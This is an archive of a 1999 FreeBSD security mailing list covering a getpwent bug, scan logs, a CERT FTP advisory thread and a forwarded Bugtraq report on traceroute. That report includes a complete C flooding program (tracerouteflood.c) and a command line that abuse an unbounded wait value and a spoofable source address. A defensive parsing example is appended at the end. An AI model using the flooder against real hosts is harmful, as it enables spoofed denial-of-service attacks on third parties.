From owner-freebsd-security Sun Feb 14 12:09:39 1999
Message-Id: <199902142010.XAA01375@shuttle.svib.ru>
To: security@FreeBSD.ORG
Reply-To: tarkhil@asteroid.svib.ru
Subject: Security bug in getpwent?
Date: Sun, 14 Feb 1999 23:10:34 +0300
From: Alex Povolotsky

Hello!

I've just noticed that getpwent, returning * as password, doesn't set
_PWF_PASS in pw_fields, allowing anyone logged in locally to find all
non-passworded accounts and leaving absolutely no traces.

I'd consider it a bug. The patch is trivial, should I make it and post?

Alex.
--
Alexander B. Povolotsky [ICQ 18277558]
[2:5020/145] [http://freebsd.svib.ru] [tarkhil@asteroid.svib.ru]
[Urgent messages: 234-9696 ΑΒ.#35442 or tarkhil@pager.express.ru]

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Feb 14 19:30:16 1999
Date: Mon, 15 Feb 1999 13:59:54 +1030 (CST)
From: Kris Kennaway
To: security@FreeBSD.ORG
Subject: traceroute as a flooder (fwd)

The first of the two problems described below also occurs with FreeBSD's
traceroute (as of 4.0-CURRENT). Specifically, traceroute -w 2147483647 will
not pause between subsequent packet transmissions, leading to a possible use
as a packet flooder.

I haven't looked at the other problem outlined here.

Kris

-----
(ASP) Microsoft Corporation (MSFT) announced today that the release of its
productivity suite, Office 2000, will be delayed until the first quarter
of 1901.
---------- Forwarded message ----------
Date: Sat, 13 Feb 1999 01:38:11 +0100
From: Alfonso De Gregorio
To: BUGTRAQ@netspace.org
Subject: traceroute as a flooder

two traceroute's bugs allow any user (since it's often suided) to use
traceroute as a little udp, or (only for versions from 1.4) also icmp,
flooder.

BTW, i've tested these bugs only on x86 boxes with the most diffused
GNU/Linux distro: Debian, Slackware, RedHat (all of them with 2.0.34
kernel), and on an alpha with Digital Unix V4.0

-first bug-
waittime value
affected systems: x86 linux and alpha digital unix

traceroute doesn't handle too high an argument value for the -w option.
the limit value doesn't seem to remain constant, but it's never greater
than (1<<31)-1 or on the other hand ((1<<(sizeof(int)*8)-1)-1) on systems
already tested where the size of an int is 4.

AFAIK, the problem is the way the waittime value is set
(waittime = str2val(optarg, "wait time",2,-1);), used in wait_for_reply
to wait for a response of a probe.

so .. passing a high value to the -w option traceroute will not wait for
packets coming back.

-second bug-
-s (the source address of outgoing probe packets)
affected system: x86 linux (maybe others)

Usually traceroute checks if the source address of the outgoing probe
packets matches one of the machine's interface addresses; in case of
mismatch, an error is returned and nothing is sent.

on x86 linux traceroute fails this check.
in this way anyone can send packets that appear to come from a fake address
(spoofed) and will not receive response packets (TIME_EXCEEDED or
PORT_UNREACHABLE and unexpected packets, too)

considering the maximum number of packets that traceroute can send, the
number of packets per second received by the target host, the minimal ICMP
packet used by traceroute (IIRC just few bytes for the rtt computation), an
udp/icmp flood made using traceroute should be absolutely powerless and no
one can make a real DoS against a victim; however just setting the number
of queries (-q), the packetsize, and if we want it also the time-to-live of
the first outgoing packet i've frozen a bit a windows box until packets
finished.

(as a matter of fact since we are not using traceroute to track the route
is followed by a packet but we are just trying to flood, if we know the
topology of the net between us and the target (eg we are using a link state
protocol or we have already checked the number of hops) we can set the
time-to-live of the first outgoing packet to the distance.)
all in all seemingly the bugs addressed in this mail don't appear to be a
big security issue but just a tcp/ip weakness, anyway it's better to be
informed :-) IMHO

BTW, if you wan't use sth like
`traceroute -w $(((1<<31)-1)) -q 8 -f n -s xxx.xxx.xxx.xxx target 1460'
or if you wan't try to guess the limit of the waittime value, there are few
lines of code, below, (tracerouteflood.c) that show as can be used these
tcp/ip weakness; just an example, nothing more

ciao
fhex

"Software is like sex; it's better when it's free"
- Linus Torvalds -

--cut here--
/*
  tracerouteflood.c
  by (fhex) Alfonso De Gregorio

  a special thanks to:
    my sister :)
    Davide (buzzz) Bozzelli a great friend that let me use his alpha
    Salvatore (antirez) Sanfilippo and Lorenzo (gigi_sull) Cavallaro
      two friend always available to pay attention to my nonsenses
      and take me great advices

  This program is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License as published by
  the Free Software Foundation; version 2 of the License.
  -------------------------------------------------------------------------
  WARNING: this program is only for demonstrative use. USE IT AT YOUR OWN
  RISK! The authors decline responsibility caused by bad or malicious use.

  to compile: gcc -O2 tracerouteflood.c -o tracerouteflood
  (should compile successfully on Debian, Slackware, RedHat, DigitalUnix etc.)

  alfonso de gregorio
  -------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define TRACEROUTE "/usr/sbin/traceroute"   /* traceroute's pathname */
#define MAX_LENGHT 12                       /* buffer dimension */

int usage(char *argo)
{
  printf("usage: %s: %s [-I] [-f first_ttl] [-q nqueries] [-s source_ip] hostname [packetlen]\n", argo,argo);
  printf("\t -I\t\tflood using ICMP ECHO instead of UDP datagrams.\n");
  printf("\t -f firt_ttl\tthe initial time-to-live used in the first outgoing packet\n");
  printf("\t -q nqueries\tqueries number\n");
  printf("\t -s source_ip\tthis ip is the address of the outgoing packets\n");
  printf("\n\t(-I and -f switches works only with traceroute 1.4 or higher)\n");
  printf("\t[source_ip] can be arbitrary only on linux\n");
  printf("\n\tFor example:./tracerouteflood -I -f 2 -q 8 -s xxx.xxx.xxx.xxx dest.somewhere.com 1460\n");
  return 1;
}

int main(int argc, char **argv )
{
  char badwait[MAX_LENGHT];
  pid_t pid_traceroute;
  register int op;
  int i,j;
  char *cmdline[10]={};

  if (argc < 2 || argc > 10 )
    exit(usage(argv[0]));

#ifdef __alpha__
  /* an integer overflow */
  /* please, if ((1<<(sizeof(int)*8)-1)-1) isn't enough on your system
     replace it with just a big number (don't forget to mail me :)*/
  sprintf(badwait,"%ld",((1<<(sizeof(int)*8)-1)-1) );
#else
  snprintf(badwait,MAX_LENGHT,"%ld",((1<<(sizeof(int)*8)-1)-1) );
#endif

  opterr=0;
  while ((op = getopt(argc, argv, "If:q:s:")) != EOF)
    switch (op) {
    case 'I':
      cmdline[1]=argv[optind-1];
      break;
    case 'f':
      cmdline[2]=argv[optind-2];
      cmdline[3]=argv[optind-1];
      break;
    case 'q':
      cmdline[4]=argv[optind-2];
      cmdline[5]=argv[optind-1];
      break;
    case 's':
      /* if you have noticed -s bug also on other systems then linux
         let free to add here the symbol for the preprocessor
         (and don't forget to mail me:) */
#ifdef __linux__
      cmdline[6]=argv[optind-2];
      cmdline[7]=argv[optind-1];
#else
      printf("since now this bug appeare to be present only on linux\n");
      exit(1);
#endif
      break;
    default:
      exit(usage(argv[0]));
      break;
    }

  switch (argc - optind) {
  case 1:
    cmdline[8]=argv[optind];
    break;
  case 2:
    cmdline[8]=argv[optind];
    cmdline[9]=argv[optind+1];
    break;
  default:
    exit(usage(argv[0]));
  }

  for (i=1;i<9;i++){
    if (cmdline[i] == NULL && cmdline[i+1] != NULL) {
      for(j=i;j<9;j++){
        cmdline[j]=cmdline[j+1];
        cmdline[j+1]=(char *) NULL;
      }
      i=0;
    }
  }

  pid_traceroute = fork();
  if ( pid_traceroute == 0) {
    execl(TRACEROUTE,"traceroute","-w",badwait,cmdline[1],cmdline[2],cmdline[3],cmdline[4],cmdline[5],cmdline[6],cmdline[7],cmdline[8],cmdline[9],NULL);
    perror("exec: maybe traceroute is not in pre-arranged directory");
    exit(1);
  }

  if ( waitpid(pid_traceroute, NULL, 0) < 0) {
    printf("wait error\n");
    exit(1);
  }

  printf("done\n");
  exit(0);
}
--stop cutting--

From owner-freebsd-security Mon Feb 15 04:33:55 1999
From: ark@eltex.ru
Date: Mon, 15 Feb 1999 15:31:08 +0300
Message-Id: <199902151231.PAA16484@paranoid.eltex.spb.ru>
In-Reply-To: <199902121652.FAA14099@aniwa.sky> from "Andrew McNaughton"
Organization: "Klingon Imperial Intelligence Service"
Subject: Re: packet from port 65535 to IMAP?
To: andrew@squiz.co.nz
Cc: security@FreeBSD.ORG

nuqneH,

Got my whole network scanned this way too.

xxxx frequent check output for period since Feb 14 16:10 to Feb 14 17:10

Security Alerts summary
=-=-=-=-=-=-=-=-=-=-=-=
Feb 14 16:30:11 xxxx /kernel: securityalert: conn attempt to TCP x.y.z.me:143 from 209.218.208.120:65535

(warlords.net and similar one from asa.ca)

What was more interesting is SYN|FIN scan i got some days ago - i've never
seen something like that:

Security Warnings summary
=-=-=-=-=-=-=-=-=-=-=-=-=
Feb 10 10:35:54 xxxx /kernel: securitywarning: orphan TCP packet on x.y.z.me:143 from 202.40.17.1:65535 flags 0x3

Is there any new imap vulnerability discovered?

Andrew McNaughton said :
> From port 65535. Anyone know what it's about?
>
> Feb 12 12:03:37 dawn /kernel: ipfw: 50010 Accept TCP them.them.them.them:65535
> me.me.me.me:143 in via de0

CU in Hell
/Arkan#iD
Do i believe in Bible? Hell,man,i've seen one!

From owner-freebsd-security Mon Feb 15 06:33:46 1999
Message-Id: <199902151433.JAA01655@ns3.bassettlaudi.com>
From: "Dmitri Maximovich"
To: "security@FreeBSD.ORG"
Date: Mon, 15 Feb 1999 09:33:37 -0500
Reply-To: "Dmitri Maximovich"
Subject: getty exiting due to excessive running time

Hi All!

I'm using FreeBSD 2.2.8-RELEASE.
A few days ago, after upgrading my system to a 3Com 905B card and
recompiling the kernel, I started to receive the following messages in
/var/log/messagelog:

bash-2.02$ tail /var/log/messages
Feb 15 03:44:05 xxx getty[28013]: getty exiting due to excessive running time
Feb 15 04:21:23 xxx getty[28095]: getty exiting due to excessive running time
Feb 15 04:58:17 xxx getty[28191]: getty exiting due to excessive running time
Feb 15 05:35:34 xxx getty[28273]: getty exiting due to excessive running time
Feb 15 06:11:49 xxx getty[28367]: getty exiting due to excessive running time
Feb 15 06:48:52 xxx getty[28452]: getty exiting due to excessive running time
Feb 15 07:26:02 xxx getty[28531]: getty exiting due to excessive running time
Feb 15 08:02:59 xxx getty[28624]: getty exiting due to excessive running time
Feb 15 08:40:19 xxx getty[1403]: getty exiting due to excessive running time
Feb 15 09:17:10 xxx getty[1497]: getty exiting due to excessive running time
bash-2.02$

Can somebody explain to me what's wrong with my system?

Thanks in advance!

From owner-freebsd-security Mon Feb 15 07:21:51 1999
From: Fernando Schapachnik
Message-Id: <199902151521.MAA21088@ns1.sminter.com.ar>
Subject: Secure e-commerce
To: security@FreeBSD.ORG
Date: Mon, 15 Feb 1999 12:21:18 -0300 (GMT)

Does anybody know a good, secure and trustable tool to speak SET or
something similar (that runs on FreeBSD, of course)?

TIA!

Fernando P. Schapachnik
Network Administration
VIA Net Works Argentina SA

From owner-freebsd-security Mon Feb 15 09:30:10 1999
Date: Mon, 15 Feb 1999 12:29:28 -0500 (EST)
From: Garrett Wollman
Message-Id: <199902151729.MAA09832@khavrinen.lcs.mit.edu>
To: tarkhil@asteroid.svib.ru
Cc: security@FreeBSD.ORG
Subject: Security bug in getpwent?
In-Reply-To: <199902142010.XAA01375@shuttle.svib.ru>
References: <199902142010.XAA01375@shuttle.svib.ru>

< said:

> I've just noticed that getpwent, returning * as password, doesn't set
> _PWF_PASS in pw_fields, allowing anyone logged in locally to find all
> non-passworded accounts and leaving absolutely no traces.

Don't do that, then.

-GAWollman

--
Garrett A. Wollman   | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu  | O Siem / The fires of freedom
Opinions not those of| Dance in the burning flame
MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick

From owner-freebsd-security Mon Feb 15 19:11:34 1999
From: "Crist J. Clark"
Message-Id: <199902160313.WAA29938@cc942873-a.ewndsr1.nj.home.com>
Subject: CA-99-03-FTP-Buffer-Overflows
To: freebsd-security@FreeBSD.ORG
Date: Mon, 15 Feb 1999 22:13:07 -0500 (EST)
Reply-To: cjclark@home.com

See,

http://www.cert.org/advisories/CA-99-03-FTP-Buffer-Overflows.html

For the full text.

Is FreeBSD vulnerable? I hope that this,

> % NetBSD
>
> % NetBSD All versions ARE NOT vulnerable.

Implies FreeBSD is neither. I know FreeBSD and NetBSD use the same
ftp, but ftpd? Just looking for verification. Thanks.
--
Crist J. Clark                           cjclark@home.com

From owner-freebsd-security Tue Feb 16 01:13:28 1999
Message-Id: <199902160913.WAA17654@aniwa.sky>
To: cjclark@home.com
cc: freebsd-security@FreeBSD.ORG
Subject: Re: CA-99-03-FTP-Buffer-Overflows
In-reply-to: Your message of "Mon, 15 Feb 1999 22:13:07 CDT." <199902160313.WAA29938@cc942873-a.ewndsr1.nj.home.com>
Date: Tue, 16 Feb 1999 22:13:02 +1300
From: Andrew McNaughton

> See,
>
> http://www.cert.org/advisories/CA-99-03-FTP-Buffer-Overflows.html
>
> For the full text.
>
> Is FreeBSD vulnerable? I hope that this,
>
> > % NetBSD
> >
> > % NetBSD All versions ARE NOT vulnerable.
>
> Implies FreeBSD is neither. I know FreeBSD and NetBSD use the same
> ftp, but ftpd? Just looking for verification. Thanks.

I found it rather curious that FreeBSD's ftpd was not mentioned.
Particularly as the PGP signature's version ID said FreeBSD was used,
implying that it would have been around for testing.
Andrew McNaughton

From owner-freebsd-security Tue Feb 16 06:23:40 1999
Message-ID: <19990216093953.A324@weathership.homeport.org>
Date: Tue, 16 Feb 1999 09:39:53 -0500
From: Adam Shostack
To: Andrew McNaughton, cjclark@home.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: CA-99-03-FTP-Buffer-Overflows
References: <199902160313.WAA29938@cc942873-a.ewndsr1.nj.home.com> <199902160913.WAA17654@aniwa.sky>
In-Reply-To: <199902160913.WAA17654@aniwa.sky>; from Andrew McNaughton on Tue, Feb 16, 1999 at 10:13:02PM +1300

Jordan sent email to security-officer@freebsd.org on Jan 20th or so,
and we got no response. We'd be happy to include FreeBSD if we get an
answer about the FTPd shipped with the OS. Wu- and pro- are vulnerable.

Adam

On Tue, Feb 16, 1999 at 10:13:02PM +1300, Andrew McNaughton wrote:
| > See,
| >
| > http://www.cert.org/advisories/CA-99-03-FTP-Buffer-Overflows.html
| >
| > For the full text.
| >
| > Is FreeBSD vulnerable? I hope that this,
| >
| > > % NetBSD
| > >
| > > % NetBSD All versions ARE NOT vulnerable.
| >
| > Implies FreeBSD is neither. I know FreeBSD and NetBSD use the same
| > ftp, but ftpd? Just looking for verification. Thanks.
|
| I found it rather curious that FreeBSD's ftpd was not mentioned.
| Particularly as the PGP signature's version ID said FreeBSD was used,
| implying that it would have been around for testing.
|
| Andrew McNaughton

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From owner-freebsd-security Tue Feb 16 06:26:19 1999
Date: Tue, 16 Feb 1999 09:25:58 -0500 (EST)
From: Robert Watson
Reply-To: Robert Watson
To: Andrew McNaughton
cc: cjclark@home.com, freebsd-security@FreeBSD.ORG
Subject: Re: CA-99-03-FTP-Buffer-Overflows
In-Reply-To: <199902160913.WAA17654@aniwa.sky>

On Tue, 16 Feb 1999, Andrew McNaughton wrote:

> I found it rather curious that FreeBSD's ftpd was not mentioned.
> Particularly as the PGP signature's version ID said FreeBSD was used,
> implying that it would have been around for testing.

I did also, so emailed the author of the advisory about it.
I was told that they had problems contacting a vendor to be responsible for
the report, although they had verified that the problem did not exist. I
forwarded this mail to Jordan and expressed my concern, but from Jordan's
response I am guessing that it might actually have been a problem on the
part of the advisory author. I emailed the author back again with Jordan's
response and inquired as to what routes they had attempted to contact us
by, but never received a response.

It's not clear to me yet who dropped the ball, but who knows :-). My
understanding has always been that our web page is sufficiently clear about
who to contact; if I get a response I will continue to follow up on it.

Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C

Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
SafePort Network Services             http://www.safeport.com/

From owner-freebsd-security Tue Feb 16 08:04:20 1999
Message-ID: <36C9B81F.2EB1CA59@healer.com>
Date: Tue, 16 Feb 1999 10:25:35 -0800
From: Coranth Gryphon
To: freebsd-security@FreeBSD.ORG
Subject: Re: CA-99-03-FTP-Buffer-Overflows
References: <199902160313.WAA29938@cc942873-a.ewndsr1.nj.home.com> <199902160913.WAA17654@aniwa.sky> <19990216093953.A324@weathership.homeport.org>

| > http://www.cert.org/advisories/CA-99-03-FTP-Buffer-Overflows.html
| > For the full text.

Given that Wu-FTPd is vulnerable, are there any plans to issue
a specific patch under FreeBSD for the academ version (2.4.2-b18),
or is FreeBSD going to start supporting the VR-series?

-coranth
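
For the -w report in the "traceroute as a flooder" message earlier in this digest, where the wait time is read with no upper limit, here is a bounded parser with a checked unit conversion. This is an added example, not code from the post or from traceroute. The names parse_bounded, secs_to_ticks32, secs_to_ticks_checked and MAX_WAIT_SECS, the 100 Hz tick rate, and the 32-bit tick model of how a huge value can become "no wait" are all assumptions made for illustration.

```c
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Assumed policy cap for -w, in seconds; not a value taken from traceroute. */
#define MAX_WAIT_SECS 86400L

/*
 * Bounded stand-in for a str2val()-style helper (hypothetical name).
 * Returns 0 and stores the value on success, -1 on any rejected input.
 * The caller must always supply an upper bound; there is no "-1 = no limit".
 */
int parse_bounded(const char *s, long min, long max, long *out)
{
    char *end;
    long v;

    if (s == NULL || *s == '\0' || min > max)
        return -1;
    errno = 0;
    v = strtol(s, &end, 10);
    if (errno == ERANGE || end == s || *end != '\0')
        return -1;                  /* overflowed long, empty, or trailing junk */
    if (v < min || v > max)
        return -1;                  /* outside the range the caller allows */
    *out = v;
    return 0;
}

/*
 * Assumed model of the failure: seconds scaled into a 32-bit signed tick
 * counter with no check. Unsigned arithmetic is used so the wrap-around is
 * well defined; the result is then reinterpreted as a signed value.
 */
int32_t secs_to_ticks32(int32_t secs, int32_t hz)
{
    uint32_t u = (uint32_t)secs * (uint32_t)hz;

    return u <= (uint32_t)INT32_MAX ? (int32_t)u
                                    : (int32_t)((int64_t)u - 4294967296LL);
}

/* Checked conversion: refuses any value whose product would not fit. */
int secs_to_ticks_checked(long secs, long hz, int32_t *ticks)
{
    if (secs < 0 || hz <= 0 || secs > INT32_MAX / hz)
        return -1;
    *ticks = (int32_t)(secs * hz);
    return 0;
}

int main(void)
{
    /* Constructed sample arguments for a -w option. */
    const char *samples[] = { "5", "2147483647", "1", "5x" };
    long w;
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        if (parse_bounded(samples[i], 2, MAX_WAIT_SECS, &w) == 0)
            printf("-w %s accepted (%ld s)\n", samples[i], w);
        else
            printf("-w %s rejected\n", samples[i]);
    }
    /* In the unchecked model the largest int becomes a negative timeout. */
    printf("unchecked ticks for INT32_MAX s at 100 Hz: %d\n",
           (int)secs_to_ticks32(INT32_MAX, 100));
    return 0;
}
```

A timeout that goes negative or is rejected by the kernel is treated as already expired, so the cap belongs at the point where the option is parsed, before any arithmetic on it.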